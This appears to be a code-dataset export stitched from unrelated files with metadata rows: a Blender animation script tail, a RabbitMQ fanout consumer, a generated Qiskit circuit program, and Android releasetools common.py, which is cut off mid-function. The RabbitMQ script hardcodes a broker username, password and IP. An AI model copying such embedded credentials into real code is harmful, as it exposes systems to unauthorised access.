# pose = segment.getPoses(t, obj.name)
# p = P[t-segment.timeStart]
# p.co = (pose[0], pose[1], pose[2], 1.0)
for t in range(segment.timeStart, segment.timeEnd, NkeyframeSteps):
pose = segment.getPoses(t, name)
color = segment.getColor(name)
bpy.context.scene.frame_set(t)
obj.location = pose[0:3]
obj.rotation_mode = 'QUATERNION'
obj.rotation_quaternion = pose[3:]
obj.parent = None
obj.keyframe_insert(data_path="location", index=-1)
obj.keyframe_insert(data_path="rotation_quaternion", index=-1)
for fcurve in obj.animation_data.action.fcurves:
kf = fcurve.keyframe_points[-1]
kf.interpolation = 'CONSTANT'
# pattern = re.compile(r'^(b|node)[0-9]+')
# if pattern.match(obj.name):
if '_' not in obj.name:
# print("Add glass material.")
addMaterialGlass(obj)
else:
addMaterialColor(obj, color)
if "gripper" in obj.name:
P = curves[obj.name].data.splines[0].points
addMaterialColor(curves[obj.name], color)
material = curves[obj.name].active_material
material.shadow_method = 'NONE'
curves[obj.name].cycles_visibility.shadow = False
material.use_nodes = True
bsdf = material.node_tree.nodes["Principled BSDF"]
bsdf.inputs['Base Color'].default_value = color
L = len(P)
for ctrPts in range(0, L):
tval = t - ctrPts
if tval > 0:
cPose = segment.getPoses(tval, name)
else:
cPose = segment.getPoses(0, name)
p = P[ctrPts]
#Ordering of points: left is current in time, right is back in time
p.co = (cPose[0], cPose[1], cPose[2], 1.0)
##Attempt at letting path fade out (does not work yet)
alpha = 1.0 - float(ctrPts)/float(L)
slot = curves[obj.name].material_slots[0]
slot.material.diffuse_color[3] = alpha
p.keyframe_insert(data_path="co", index=-1)
####WEIRD behavior during fadeout
if "gripper" in obj.name:
##add fadeout
tend = segment.timeEnd
P = curves[obj.name].data.splines[0].points
L = len(P)
if tend+L > bpy.context.scene.frame_end:
bpy.context.scene.frame_end = tend + L
for t in range(tend, tend + L):
bpy.context.scene.frame_set(t)
for ctrPts in range(0, L):
tval = t - ctrPts
if tval <= 0:
cPose = segment.getPoses(0, name)
elif tval < tend:
cPose = segment.getPoses(tval, name)
else:
cPose = segment.getPoses(tend-1, name)
p = P[ctrPts]
p.co = (cPose[0], cPose[1], cPose[2], 1)
p.keyframe_insert(data_path="co")
###############################################################################
## LIGHTNING
###############################################################################
lightLocation = 0.3*(cameraLocation-cameraFocusPoint)+Vector((0,0,+5))
# addLightSourceSun(lightLocation)
addLightSourcePoint(lightLocation)
###############################################################################
## CAMERA
###############################################################################
bpy.context.scene.frame_end += tPaddingEnd
tend = bpy.context.scene.frame_end
camera = Camera(cameraLocation, cameraFocusPoint)
#0:0,pick 141,place 56,retract 53;252,pick 48,place 307,retract 52;
#TODO: zoom in/out to specific distance
distance = copy.copy(camera.distance)
if doZoom:
camera.zoomIn(tZoomStart, tZoomStart+50)
camera.zoomOut(tZoomStart+50+50, tZoomStart+50+50+tZoomOutDuration)
#camera.rotate(253+10, tend)
camera.rotate(tRotationStart, tend)
# camera.zoomOut(210,400)
## set view to camera
for area in bpy.context.screen.areas:
if area.type == 'VIEW_3D':
area.spaces[0].region_3d.view_perspective = 'CAMERA'
break
###############################################################################
## RENDERING
###############################################################################
renderEngine = bpy.context.scene.render
renderEngine.image_settings.file_format = "FFMPEG"
renderEngine.ffmpeg.format = "MPEG4"
renderEngine.ffmpeg.codec = "H264"
renderEngine.ffmpeg.constant_rate_factor = "HIGH" #MEDIUM, LOW
renderEngine.filepath = dirname+"/"+filename+".mp4"
### Render Animation to MP4 video
if renderAnimation:
print("Starting to render %d frames."% bpy.context.scene.frame_end)
bpy.ops.render.render(animation=True)
elapsed_time = time.process_time() - time_start_script
print("TIME for RENDERING: %f (in s), %f (in m), %f (in h)"%\
(elapsed_time,elapsed_time/60,elapsed_time/60/60))
| [
"[email protected]"
] | |
e2e88c41fcb82cba6f6b2533f7d4532d42c84a36 | 0a7d49300a547eecc823b78a891057f1017db1b2 | /rabbitmq/fanout_rec.py | e041a3d36ed001c4e471e104b35850cdfe3400c3 | [] | no_license | PeterZhangxing/codewars | f315b2ce610207e84a2f0927bc47b4b1dd89bee4 | 8e4dfaaeae782a37f6baca4c024b1c2a1dc83cba | refs/heads/master | 2020-09-22T12:09:59.419919 | 2020-03-02T12:52:55 | 2020-03-02T12:52:55 | 224,330,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | import pika
credentials = pika.PlainCredentials('zx2005', 'redhat')
# 使用上面定义的用户名密码,连接远程的队列服务器
connection = pika.BlockingConnection(pika.ConnectionParameters(
"10.1.1.128",
credentials=credentials
))
# 在tcp连接基础上,建立rabbit协议连接
channel = connection.channel()
# 申明一个广播类型的交换器
channel.exchange_declare(exchange='logs', exchange_type='fanout')
# 不指定queue名字,rabbit会随机分配一个名字,exclusive=True会在使用此queue的消费者断开后,自动将queue删除
result = channel.queue_declare(exclusive=True)
queue_name = result.method.queue # 取得随机队列的名字
# 使得队列接收交换器发来的消息
channel.queue_bind(exchange='logs', queue=queue_name)
# 从自己申明的队列接收广播消息
def callback(ch, method, properties, body):
print(" [x] %r" % body)
# 开始从队列中取出数据
channel.basic_consume(callback, queue=queue_name,no_ack=True)
channel.start_consuming() | [
"[email protected]"
] | |
67316c99dc3b31b9eb2fb8f6fffd399a5f6f62fb | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p2DJ/New/program/qiskit/QC/startQiskit_QC108.py | d99f75a7d7cceec4efb22f76cc195c74e2336e37 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,104 | py | # qubit number=2
# total number=8
import cirq
import qiskit
from qiskit import IBMQ
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
# oracle.draw('mpl', filename='circuit/deutsch-oracle.png')
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n, "qc")
target = QuantumRegister(1, "qt")
prog = QuantumCircuit(input_qubit, target)
# inverse last one (can be omitted if using O_f^\pm)
prog.x(target)
# apply H to get superposition
for i in range(n):
prog.h(input_qubit[i])
prog.h(input_qubit[1]) # number=1
prog.cx(input_qubit[0],input_qubit[1]) # number=2
prog.cx(input_qubit[0],input_qubit[1]) # number=5
prog.h(target)
prog.barrier()
# apply oracle O_f
oracle = build_oracle(n, f)
prog.append(
oracle.to_gate(),
[input_qubit[i] for i in range(n)] + [target])
# apply H back (QFT on Z_2^n)
for i in range(n):
prog.h(input_qubit[i])
prog.barrier()
# measure
#for i in range(n):
# prog.measure(input_qubit[i], classicals[i])
prog.x(input_qubit[0]) # number=3
prog.x(input_qubit[0]) # number=4
prog.swap(input_qubit[1],input_qubit[0]) # number=6
prog.swap(input_qubit[1],input_qubit[0]) # number=7
# circuit end
return prog
if __name__ == '__main__':
n = 2
f = lambda rep: rep[-1]
# f = lambda rep: "1" if rep[0:2] == "01" or rep[0:2] == "10" else "0"
# f = lambda rep: "0"
prog = make_circuit(n, f)
sample_shot =2800
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = provider.get_backend("ibmq_belem")
circuit1 = transpile(prog,FakeVigo())
circuit1.x(qubit=3)
circuit1.x(qubit=3)
circuit1.measure_all()
prog = circuit1
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
writefile = open("../data/startQiskit_QC108.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| [
"[email protected]"
] | |
3af0de1078602eb1f3aefb95f8e1cf7963429092 | 47b71ff8a12367c10573e58289d6abbd41c2436f | /android/build/tools/releasetools/common.py | 30ffab38faab92b96f5a6f2b019841c94567bf9c | [
"Apache-2.0"
] | permissive | BPI-SINOVOIP/BPI-A31S-Android | d567fcefb8881bcca67f9401c5a4cfa875df5640 | ed63ae00332d2fdab22efc45a4a9a46ff31b8180 | refs/heads/master | 2022-11-05T15:39:21.895636 | 2017-04-27T16:58:45 | 2017-04-27T16:58:45 | 48,844,096 | 2 | 4 | null | 2022-10-28T10:10:24 | 2015-12-31T09:34:31 | null | UTF-8 | Python | false | false | 29,923 | py | # Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import errno
import getopt
import getpass
import imp
import os
import platform
import re
import shlex
import shutil
import subprocess
import sys
import tempfile
import threading
import time
import zipfile
try:
from hashlib import sha1 as sha1
except ImportError:
from sha import sha as sha1
# missing in Python 2.4 and before
if not hasattr(os, "SEEK_SET"):
os.SEEK_SET = 0
class Options(object): pass
OPTIONS = Options()
OPTIONS.search_path = "out/host/linux-x86"
OPTIONS.signapk_path = "framework/signapk.jar" # Relative to search_path
OPTIONS.extra_signapk_args = []
OPTIONS.java_path = "java" # Use the one on the path by default.
OPTIONS.public_key_suffix = ".x509.pem"
OPTIONS.private_key_suffix = ".pk8"
OPTIONS.verbose = False
OPTIONS.tempfiles = []
OPTIONS.device_specific = None
OPTIONS.extras = {}
OPTIONS.info_dict = None
# Values for "certificate" in apkcerts that mean special things.
SPECIAL_CERT_STRINGS = ("PRESIGNED", "EXTERNAL")
class ExternalError(RuntimeError): pass
def Run(args, **kwargs):
"""Create and return a subprocess.Popen object, printing the command
line on the terminal if -v was specified."""
if OPTIONS.verbose:
print " running: ", " ".join(args)
return subprocess.Popen(args, **kwargs)
def CloseInheritedPipes():
""" Gmake in MAC OS has file descriptor (PIPE) leak. We close those fds
before doing other work."""
if platform.system() != "Darwin":
return
for d in range(3, 1025):
try:
stat = os.fstat(d)
if stat is not None:
pipebit = stat[0] & 0x1000
if pipebit != 0:
os.close(d)
except OSError:
pass
def LoadInfoDict(zip):
"""Read and parse the META/misc_info.txt key/value pairs from the
input target files and return a dict."""
d = {}
try:
for line in zip.read("META/misc_info.txt").split("\n"):
line = line.strip()
if not line or line.startswith("#"): continue
k, v = line.split("=", 1)
d[k] = v
except KeyError:
# ok if misc_info.txt doesn't exist
pass
# backwards compatibility: These values used to be in their own
# files. Look for them, in case we're processing an old
# target_files zip.
if "mkyaffs2_extra_flags" not in d:
try:
d["mkyaffs2_extra_flags"] = zip.read("META/mkyaffs2-extra-flags.txt").strip()
except KeyError:
# ok if flags don't exist
pass
if "recovery_api_version" not in d:
try:
d["recovery_api_version"] = zip.read("META/recovery-api-version.txt").strip()
except KeyError:
raise ValueError("can't find recovery API version in input target-files")
if "tool_extensions" not in d:
try:
d["tool_extensions"] = zip.read("META/tool-extensions.txt").strip()
except KeyError:
# ok if extensions don't exist
pass
if "fstab_version" not in d:
d["fstab_version"] = "1"
try:
data = zip.read("META/imagesizes.txt")
for line in data.split("\n"):
if not line: continue
name, value = line.split(" ", 1)
if not value: continue
if name == "blocksize":
d[name] = value
else:
d[name + "_size"] = value
except KeyError:
pass
def makeint(key):
if key in d:
d[key] = int(d[key], 0)
makeint("recovery_api_version")
makeint("blocksize")
makeint("system_size")
makeint("userdata_size")
makeint("cache_size")
makeint("recovery_size")
makeint("boot_size")
makeint("fstab_version")
d["fstab"] = LoadRecoveryFSTab(zip, d["fstab_version"])
d["build.prop"] = LoadBuildProp(zip)
return d
def LoadBuildProp(zip):
try:
data = zip.read("SYSTEM/build.prop")
except KeyError:
print "Warning: could not find SYSTEM/build.prop in %s" % zip
data = ""
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"): continue
name, value = line.split("=", 1)
d[name] = value
return d
def LoadRecoveryFSTab(zip, fstab_version):
class Partition(object):
pass
try:
data = zip.read("RECOVERY/RAMDISK/etc/recovery.fstab")
except KeyError:
print "Warning: could not find RECOVERY/RAMDISK/etc/recovery.fstab in %s." % zip
data = ""
if fstab_version == 1:
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"): continue
pieces = line.split()
if not (3 <= len(pieces) <= 4):
raise ValueError("malformed recovery.fstab line: \"%s\"" % (line,))
p = Partition()
p.mount_point = pieces[0]
p.fs_type = pieces[1]
p.device = pieces[2]
p.length = 0
options = None
if len(pieces) >= 4:
if pieces[3].startswith("/"):
p.device2 = pieces[3]
if len(pieces) >= 5:
options = pieces[4]
else:
p.device2 = None
options = pieces[3]
else:
p.device2 = None
if options:
options = options.split(",")
for i in options:
if i.startswith("length="):
p.length = int(i[7:])
else:
print "%s: unknown option \"%s\"" % (p.mount_point, i)
d[p.mount_point] = p
elif fstab_version == 2:
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"): continue
pieces = line.split()
if len(pieces) != 5:
raise ValueError("malformed recovery.fstab line: \"%s\"" % (line,))
# Ignore entries that are managed by vold
options = pieces[4]
if "voldmanaged=" in options: continue
# It's a good line, parse it
p = Partition()
p.device = pieces[0]
p.mount_point = pieces[1]
p.fs_type = pieces[2]
p.device2 = None
p.length = 0
options = options.split(",")
for i in options:
if i.startswith("length="):
p.length = int(i[7:])
else:
# Ignore all unknown options in the unified fstab
continue
d[p.mount_point] = p
else:
raise ValueError("Unknown fstab_version: \"%d\"" % (fstab_version,))
return d
def DumpInfoDict(d):
for k, v in sorted(d.items()):
print "%-25s = (%s) %s" % (k, type(v).__name__, v)
def BuildBootableImage(sourcedir, fs_config_file, info_dict=None):
"""Take a kernel, cmdline, and ramdisk directory from the input (in
'sourcedir'), and turn them into a boot image. Return the image
data, or None if sourcedir does not appear to contains files for
building the requested image."""
if (not os.access(os.path.join(sourcedir, "RAMDISK"), os.F_OK) or
not os.access(os.path.join(sourcedir, "kernel"), os.F_OK)):
return None
if info_dict is None:
info_dict = OPTIONS.info_dict
ramdisk_img = tempfile.NamedTemporaryFile()
img = tempfile.NamedTemporaryFile()
if os.access(fs_config_file, os.F_OK):
cmd = ["mkbootfs", "-f", fs_config_file, os.path.join(sourcedir, "RAMDISK")]
else:
cmd = ["mkbootfs", os.path.join(sourcedir, "RAMDISK")]
p1 = Run(cmd, stdout=subprocess.PIPE)
p2 = Run(["minigzip"],
stdin=p1.stdout, stdout=ramdisk_img.file.fileno())
p2.wait()
p1.wait()
assert p1.returncode == 0, "mkbootfs of %s ramdisk failed" % (targetname,)
assert p2.returncode == 0, "minigzip of %s ramdisk failed" % (targetname,)
cmd = ["mkbootimg", "--kernel", os.path.join(sourcedir, "kernel")]
fn = os.path.join(sourcedir, "cmdline")
if os.access(fn, os.F_OK):
cmd.append("--cmdline")
cmd.append(open(fn).read().rstrip("\n"))
fn = os.path.join(sourcedir, "base")
if os.access(fn, os.F_OK):
cmd.append("--base")
cmd.append(open(fn).read().rstrip("\n"))
fn = os.path.join(sourcedir, "pagesize")
if os.access(fn, os.F_OK):
cmd.append("--pagesize")
cmd.append(open(fn).read().rstrip("\n"))
args = info_dict.get("mkbootimg_args", None)
if args and args.strip():
cmd.extend(args.split())
cmd.extend(["--ramdisk", ramdisk_img.name,
"--output", img.name])
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "mkbootimg of %s image failed" % (
os.path.basename(sourcedir),)
img.seek(os.SEEK_SET, 0)
data = img.read()
ramdisk_img.close()
img.close()
return data
def GetBootableImage(name, prebuilt_name, unpack_dir, tree_subdir,
info_dict=None):
"""Return a File object (with name 'name') with the desired bootable
image. Look for it in 'unpack_dir'/BOOTABLE_IMAGES under the name
'prebuilt_name', otherwise construct it from the source files in
'unpack_dir'/'tree_subdir'."""
prebuilt_path = os.path.join(unpack_dir, "BOOTABLE_IMAGES", prebuilt_name)
if os.path.exists(prebuilt_path):
print "using prebuilt %s..." % (prebuilt_name,)
return File.FromLocalFile(name, prebuilt_path)
else:
print "building image from target_files %s..." % (tree_subdir,)
fs_config = "META/" + tree_subdir.lower() + "_filesystem_config.txt"
return File(name, BuildBootableImage(os.path.join(unpack_dir, tree_subdir),
os.path.join(unpack_dir, fs_config),
info_dict))
def UnzipTemp(filename, pattern=None):
"""Unzip the given archive into a temporary directory and return the name.
If filename is of the form "foo.zip+bar.zip", unzip foo.zip into a
temp dir, then unzip bar.zip into that_dir/BOOTABLE_IMAGES.
Returns (tempdir, zipobj) where zipobj is a zipfile.ZipFile (of the
main file), open for reading.
"""
tmp = tempfile.mkdtemp(prefix="targetfiles-")
OPTIONS.tempfiles.append(tmp)
def unzip_to_dir(filename, dirname):
cmd = ["unzip", "-o", "-q", filename, "-d", dirname]
if pattern is not None:
cmd.append(pattern)
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
if p.returncode != 0:
raise ExternalError("failed to unzip input target-files \"%s\"" %
(filename,))
m = re.match(r"^(.*[.]zip)\+(.*[.]zip)$", filename, re.IGNORECASE)
if m:
unzip_to_dir(m.group(1), tmp)
unzip_to_dir(m.group(2), os.path.join(tmp, "BOOTABLE_IMAGES"))
filename = m.group(1)
else:
unzip_to_dir(filename, tmp)
return tmp, zipfile.ZipFile(filename, "r")
def GetKeyPasswords(keylist):
"""Given a list of keys, prompt the user to enter passwords for
those which require them. Return a {key: password} dict. password
will be None if the key has no password."""
no_passwords = []
need_passwords = []
key_passwords = {}
devnull = open("/dev/null", "w+b")
for k in sorted(keylist):
# We don't need a password for things that aren't really keys.
if k in SPECIAL_CERT_STRINGS:
no_passwords.append(k)
continue
p = Run(["openssl", "pkcs8", "-in", k+OPTIONS.private_key_suffix,
"-inform", "DER", "-nocrypt"],
stdin=devnull.fileno(),
stdout=devnull.fileno(),
stderr=subprocess.STDOUT)
p.communicate()
if p.returncode == 0:
# Definitely an unencrypted key.
no_passwords.append(k)
else:
p = Run(["openssl", "pkcs8", "-in", k+OPTIONS.private_key_suffix,
"-inform", "DER", "-passin", "pass:"],
stdin=devnull.fileno(),
stdout=devnull.fileno(),
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
if p.returncode == 0:
# Encrypted key with empty string as password.
key_passwords[k] = ''
elif stderr.startswith('Error decrypting key'):
# Definitely encrypted key.
# It would have said "Error reading key" if it didn't parse correctly.
need_passwords.append(k)
else:
# Potentially, a type of key that openssl doesn't understand.
# We'll let the routines in signapk.jar handle it.
no_passwords.append(k)
devnull.close()
key_passwords.update(PasswordManager().GetPasswords(need_passwords))
key_passwords.update(dict.fromkeys(no_passwords, None))
return key_passwords
def SignFile(input_name, output_name, key, password, align=None,
whole_file=False):
"""Sign the input_name zip/jar/apk, producing output_name. Use the
given key and password (the latter may be None if the key does not
have a password.
If align is an integer > 1, zipalign is run to align stored files in
the output zip on 'align'-byte boundaries.
If whole_file is true, use the "-w" option to SignApk to embed a
signature that covers the whole file in the archive comment of the
zip file.
"""
if align == 0 or align == 1:
align = None
if align:
temp = tempfile.NamedTemporaryFile()
sign_name = temp.name
else:
sign_name = output_name
cmd = [OPTIONS.java_path, "-Xmx2048m", "-jar",
os.path.join(OPTIONS.search_path, OPTIONS.signapk_path)]
cmd.extend(OPTIONS.extra_signapk_args)
if whole_file:
cmd.append("-w")
cmd.extend([key + OPTIONS.public_key_suffix,
key + OPTIONS.private_key_suffix,
input_name, sign_name])
p = Run(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
if password is not None:
password += "\n"
p.communicate(password)
if p.returncode != 0:
raise ExternalError("signapk.jar failed: return code %s" % (p.returncode,))
if align:
p = Run(["zipalign", "-f", str(align), sign_name, output_name])
p.communicate()
if p.returncode != 0:
raise ExternalError("zipalign failed: return code %s" % (p.returncode,))
temp.close()
def CheckSize(data, target, info_dict):
"""Check the data string passed against the max size limit, if
any, for the given target. Raise exception if the data is too big.
Print a warning if the data is nearing the maximum size."""
if target.endswith(".img"): target = target[:-4]
mount_point = "/" + target
if info_dict["fstab"]:
if mount_point == "/userdata": mount_point = "/data"
p = info_dict["fstab"][mount_point]
fs_type = p.fs_type
device = p.device
if "/" in device:
device = device[device.rfind("/")+1:]
limit = info_dict.get(device + "_size", None)
if not fs_type or not limit: return
if fs_type == "yaffs2":
# image size should be increased by 1/64th to account for the
# spare area (64 bytes per 2k page)
limit = limit / 2048 * (2048+64)
size = len(data)
pct = float(size) * 100.0 / limit
msg = "%s size (%d) is %.2f%% of limit (%d)" % (target, size, pct, limit)
if pct >= 99.0:
raise ExternalError(msg)
elif pct >= 95.0:
print
print " WARNING: ", msg
print
elif OPTIONS.verbose:
print " ", msg
def ReadApkCerts(tf_zip):
"""Given a target_files ZipFile, parse the META/apkcerts.txt file
and return a {package: cert} dict."""
certmap = {}
for line in tf_zip.read("META/apkcerts.txt").split("\n"):
line = line.strip()
if not line: continue
m = re.match(r'^name="(.*)"\s+certificate="(.*)"\s+'
r'private_key="(.*)"$', line)
if m:
name, cert, privkey = m.groups()
public_key_suffix_len = len(OPTIONS.public_key_suffix)
private_key_suffix_len = len(OPTIONS.private_key_suffix)
if cert in SPECIAL_CERT_STRINGS and not privkey:
certmap[name] = cert
elif (cert.endswith(OPTIONS.public_key_suffix) and
privkey.endswith(OPTIONS.private_key_suffix) and
cert[:-public_key_suffix_len] == privkey[:-private_key_suffix_len]):
certmap[name] = cert[:-public_key_suffix_len]
else:
raise ValueError("failed to parse line from apkcerts.txt:\n" + line)
return certmap
COMMON_DOCSTRING = """
-p (--path) <dir>
Prepend <dir>/bin to the list of places to search for binaries
run by this script, and expect to find jars in <dir>/framework.
-s (--device_specific) <file>
Path to the python module containing device-specific
releasetools code.
-x (--extra) <key=value>
Add a key/value pair to the 'extras' dict, which device-specific
extension code may look at.
-v (--verbose)
Show command lines being executed.
-h (--help)
Display this usage message and exit.
"""
def Usage(docstring):
print docstring.rstrip("\n")
print COMMON_DOCSTRING
def ParseOptions(argv,
docstring,
extra_opts="", extra_long_opts=(),
extra_option_handler=None):
"""Parse the options in argv and return any arguments that aren't
flags. docstring is the calling module's docstring, to be displayed
for errors and -h. extra_opts and extra_long_opts are for flags
defined by the caller, which are processed by passing them to
extra_option_handler."""
try:
opts, args = getopt.getopt(
argv, "hvp:s:x:" + extra_opts,
["help", "verbose", "path=", "signapk_path=", "extra_signapk_args=",
"java_path=", "public_key_suffix=", "private_key_suffix=",
"device_specific=", "extra="] +
list(extra_long_opts))
except getopt.GetoptError, err:
Usage(docstring)
print "**", str(err), "**"
sys.exit(2)
path_specified = False
for o, a in opts:
if o in ("-h", "--help"):
Usage(docstring)
sys.exit()
elif o in ("-v", "--verbose"):
OPTIONS.verbose = True
elif o in ("-p", "--path"):
OPTIONS.search_path = a
elif o in ("--signapk_path",):
OPTIONS.signapk_path = a
elif o in ("--extra_signapk_args",):
OPTIONS.extra_signapk_args = shlex.split(a)
elif o in ("--java_path",):
OPTIONS.java_path = a
elif o in ("--public_key_suffix",):
OPTIONS.public_key_suffix = a
elif o in ("--private_key_suffix",):
OPTIONS.private_key_suffix = a
elif o in ("-s", "--device_specific"):
OPTIONS.device_specific = a
elif o in ("-x", "--extra"):
key, value = a.split("=", 1)
OPTIONS.extras[key] = value
else:
if extra_option_handler is None or not extra_option_handler(o, a):
assert False, "unknown option \"%s\"" % (o,)
os.environ["PATH"] = (os.path.join(OPTIONS.search_path, "bin") +
os.pathsep + os.environ["PATH"])
return args
def Cleanup():
for i in OPTIONS.tempfiles:
if os.path.isdir(i):
shutil.rmtree(i)
else:
os.remove(i)
class PasswordManager(object):
def __init__(self):
self.editor = os.getenv("EDITOR", None)
self.pwfile = os.getenv("ANDROID_PW_FILE", None)
def GetPasswords(self, items):
"""Get passwords corresponding to each string in 'items',
returning a dict. (The dict may have keys in addition to the
values in 'items'.)
Uses the passwords in $ANDROID_PW_FILE if available, letting the
user edit that file to add more needed passwords. If no editor is
available, or $ANDROID_PW_FILE isn't define, prompts the user
interactively in the ordinary way.
"""
current = self.ReadFile()
first = True
while True:
missing = []
for i in items:
if i not in current or not current[i]:
missing.append(i)
# Are all the passwords already in the file?
if not missing: return current
for i in missing:
current[i] = ""
if not first:
print "key file %s still missing some passwords." % (self.pwfile,)
answer = raw_input("try to edit again? [y]> ").strip()
if answer and answer[0] not in 'yY':
raise RuntimeError("key passwords unavailable")
first = False
current = self.UpdateAndReadFile(current)
def PromptResult(self, current):
"""Prompt the user to enter a value (password) for each key in
'current' whose value is fales. Returns a new dict with all the
values.
"""
result = {}
for k, v in sorted(current.iteritems()):
if v:
result[k] = v
else:
while True:
result[k] = getpass.getpass("Enter password for %s key> "
% (k,)).strip()
if result[k]: break
return result
def UpdateAndReadFile(self, current):
if not self.editor or not self.pwfile:
return self.PromptResult(current)
f = open(self.pwfile, "w")
os.chmod(self.pwfile, 0600)
f.write("# Enter key passwords between the [[[ ]]] brackets.\n")
f.write("# (Additional spaces are harmless.)\n\n")
first_line = None
sorted = [(not v, k, v) for (k, v) in current.iteritems()]
sorted.sort()
for i, (_, k, v) in enumerate(sorted):
f.write("[[[ %s ]]] %s\n" % (v, k))
if not v and first_line is None:
# position cursor on first line with no password.
first_line = i + 4
f.close()
p = Run([self.editor, "+%d" % (first_line,), self.pwfile])
_, _ = p.communicate()
return self.ReadFile()
def ReadFile(self):
result = {}
if self.pwfile is None: return result
try:
f = open(self.pwfile, "r")
for line in f:
line = line.strip()
if not line or line[0] == '#': continue
m = re.match(r"^\[\[\[\s*(.*?)\s*\]\]\]\s*(\S+)$", line)
if not m:
print "failed to parse password file: ", line
else:
result[m.group(2)] = m.group(1)
f.close()
except IOError, e:
if e.errno != errno.ENOENT:
print "error reading password file: ", str(e)
return result
def ZipWriteStr(zip, filename, data, perms=0644):
# use a fixed timestamp so the output is repeatable.
zinfo = zipfile.ZipInfo(filename=filename,
date_time=(2009, 1, 1, 0, 0, 0))
zinfo.compress_type = zip.compression
zinfo.external_attr = perms << 16
zip.writestr(zinfo, data)
class DeviceSpecificParams(object):
module = None
def __init__(self, **kwargs):
"""Keyword arguments to the constructor become attributes of this
object, which is passed to all functions in the device-specific
module."""
for k, v in kwargs.iteritems():
setattr(self, k, v)
self.extras = OPTIONS.extras
if self.module is None:
path = OPTIONS.device_specific
if not path: return
try:
if os.path.isdir(path):
info = imp.find_module("releasetools", [path])
else:
d, f = os.path.split(path)
b, x = os.path.splitext(f)
if x == ".py":
f = b
info = imp.find_module(f, [d])
self.module = imp.load_module("device_specific", *info)
except ImportError:
print "unable to load device-specific module; assuming none"
def _DoCall(self, function_name, *args, **kwargs):
"""Call the named function in the device-specific module, passing
the given args and kwargs. The first argument to the call will be
the DeviceSpecific object itself. If there is no module, or the
module does not define the function, return the value of the
'default' kwarg (which itself defaults to None)."""
if self.module is None or not hasattr(self.module, function_name):
return kwargs.get("default", None)
return getattr(self.module, function_name)(*((self,) + args), **kwargs)
def FullOTA_Assertions(self):
"""Called after emitting the block of assertions at the top of a
full OTA package. Implementations can add whatever additional
assertions they like."""
return self._DoCall("FullOTA_Assertions")
def FullOTA_InstallBegin(self):
"""Called at the start of full OTA installation."""
return self._DoCall("FullOTA_InstallBegin")
def FullOTA_InstallEnd(self):
"""Called at the end of full OTA installation; typically this is
used to install the image for the device's baseband processor."""
return self._DoCall("FullOTA_InstallEnd")
def IncrementalOTA_Assertions(self):
"""Called after emitting the block of assertions at the top of an
incremental OTA package. Implementations can add whatever
additional assertions they like."""
return self._DoCall("IncrementalOTA_Assertions")
def IncrementalOTA_VerifyBegin(self):
"""Called at the start of the verification phase of incremental
OTA installation; additional checks can be placed here to abort
the script before any changes are made."""
return self._DoCall("IncrementalOTA_VerifyBegin")
def IncrementalOTA_VerifyEnd(self):
"""Called at the end of the verification phase of incremental OTA
installation; additional checks can be placed here to abort the
script before any changes are made."""
return self._DoCall("IncrementalOTA_VerifyEnd")
def IncrementalOTA_InstallBegin(self):
"""Called at the start of incremental OTA installation (after
verification is complete)."""
return self._DoCall("IncrementalOTA_InstallBegin")
def IncrementalOTA_InstallEnd(self):
"""Called at the end of incremental OTA installation; typically
this is used to install the image for the device's baseband
processor."""
return self._DoCall("IncrementalOTA_InstallEnd")
class File(object):
def __init__(self, name, data):
self.name = name
self.data = data
self.size = len(data)
self.sha1 = sha1(data).hexdigest()
@classmethod
def FromLocalFile(cls, name, diskname):
f = open(diskname, "rb")
data = f.read()
f.close()
return File(name, data)
def WriteToTemp(self):
t = tempfile.NamedTemporaryFile()
t.write(self.data)
t.flush()
return t
def AddToZip(self, z):
ZipWriteStr(z, self.name, self.data)
DIFF_PROGRAM_BY_EXT = {
".gz" : "imgdiff",
".zip" : ["imgdiff", "-z"],
".jar" : ["imgdiff", "-z"],
".apk" : ["imgdiff", "-z"],
".img" : "imgdiff",
}
class Difference(object):
def __init__(self, tf, sf, diff_program=None):
self.tf = tf
self.sf = sf
self.patch = None
self.diff_program = diff_program
def ComputePatch(self):
